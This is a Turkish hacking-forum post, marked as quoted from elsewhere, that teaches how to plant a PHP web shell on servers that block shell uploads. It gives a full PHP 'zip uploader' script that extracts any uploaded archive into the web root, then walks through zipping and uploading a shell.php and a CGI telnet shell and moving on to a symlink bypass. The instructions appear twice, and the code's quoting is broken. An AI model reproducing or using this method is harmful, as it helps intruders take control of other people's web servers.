'TÜRKÇÜ
Kıdemli Üye
- 3 Haz 2017
- 2,059
- 2
Linux Shell Upload Bypass
Günümüz optimize sunucularında PHP Shell yememe oranı gittikçe artıyor.
PHP SHELL upload yapılamayan sunucularımızda ZİP Uploader yardımı ile shellimizi zip şeklinde upload edebiliriz.
Zip Uploader :
Normal basit bir uploader gibi görünsede kullanışımız farklı olucağı için işe yarıyabilir bir uploader haline gelicek.
Öncelikle sunucuya yedirmek istediğimiz PHP Shellimizi zip haliyle arşiv haline getiriyoruz.
Yani ;
Shell.php dosyasını winrar yardımı ile zip şeklinle sıkıştırıp shell.zip haline getiriyoruz.
Sonrasında uploader.phpmizi sunucuya upload ediyoruz.
Burdan sonra ise uploader.phpmize girip shell.zip dosyamızı upload ediyoruz.
Daha sonra zaten shell.zip upload edildi cevabı ile karşı karşıya geliyoruz.
Burda bilmeniz gereken en önemli nokta, Shellimize shell.zip şeklinde değil shell.php şeklinde giriyoruz.
Aynı methodu cgitelnetimizdede yapıyoruz.
cgi.izo dosyasını zipleyip sunucumuza atıyoruz sonrasında cgimize normali gibi cgi.izodan giriş yapabiliriz.
CGİ upload olduktan sonra manuel symbolic ile bypass olabilirsiniz.
Alıntıdır..
Günümüz optimize sunucularında PHP Shell yememe oranı gittikçe artıyor.
PHP SHELL upload yapılamayan sunucularımızda ZİP Uploader yardımı ile shellimizi zip şeklinde upload edebiliriz.
Zip Uploader :
Kod:
<?php echo <b>Sw Bilgi
.php_uname().
Yükleyeceğiniz Dosya .zip Olamlıdır.</b> // katilhacker;
echo <form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">;
echo <input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>;
if( $_POST[_upl] == "Upload" ) { $file = $_FILES[file][name];
if(@copy($_FILES[file][tmp_name], $_FILES[file][name])) { $zip = new ZipArchive;
if ($zip->open($file) === TRUE) {
$zip->extractTo(./);
$zip->close();
echo Yükleme Başarılı;
} else {
echo Yüklendi Ancak Çıkarma Başarısız.;
}
}else{
echo <b>Basarisiz</b>
;
}
} ?>
Normal basit bir uploader gibi görünsede kullanışımız farklı olucağı için işe yarıyabilir bir uploader haline gelicek.
Öncelikle sunucuya yedirmek istediğimiz PHP Shellimizi zip haliyle arşiv haline getiriyoruz.
Yani ;
Shell.php dosyasını winrar yardımı ile zip şeklinle sıkıştırıp shell.zip haline getiriyoruz.
Sonrasında uploader.phpmizi sunucuya upload ediyoruz.
Burdan sonra ise uploader.phpmize girip shell.zip dosyamızı upload ediyoruz.
Daha sonra zaten shell.zip upload edildi cevabı ile karşı karşıya geliyoruz.
Burda bilmeniz gereken en önemli nokta, Shellimize shell.zip şeklinde değil shell.php şeklinde giriyoruz.
Aynı methodu cgitelnetimizdede yapıyoruz.
cgi.izo dosyasını zipleyip sunucumuza atıyoruz sonrasında cgimize normali gibi cgi.izodan giriş yapabiliriz.
CGİ upload olduktan sonra manuel symbolic ile bypass olabilirsiniz.
Alıntıdır..